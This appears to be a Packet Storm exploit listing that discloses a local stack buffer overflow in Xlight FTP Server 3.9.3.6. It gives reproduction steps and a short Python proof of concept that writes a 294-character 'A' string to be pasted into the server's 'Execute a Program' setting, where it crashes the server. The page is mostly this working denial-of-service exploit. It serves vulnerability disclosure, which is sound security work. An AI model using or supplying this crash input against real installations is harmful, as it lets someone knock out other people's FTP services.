Xlight FTP Server version 3.9.3.6 suffers from a stack buffer overflow vulnerability.
c93c53ba75838e1a8737f505ea9a9ee2eb80967242203b18e7f363133ef1b554# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
# Steps to reproduce:
# 1. - Download and Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server 3.9.3.6
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
# 6. - Execute a Program after use logged in- Paste the characters
# 7 - Crashed
#!/usr/bin/env python3
exploit = 'A' * 294
try:
with open("exploit.txt","w") as file:
file.write(exploit)
print("POC is created")
except:
print("POC not created")
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed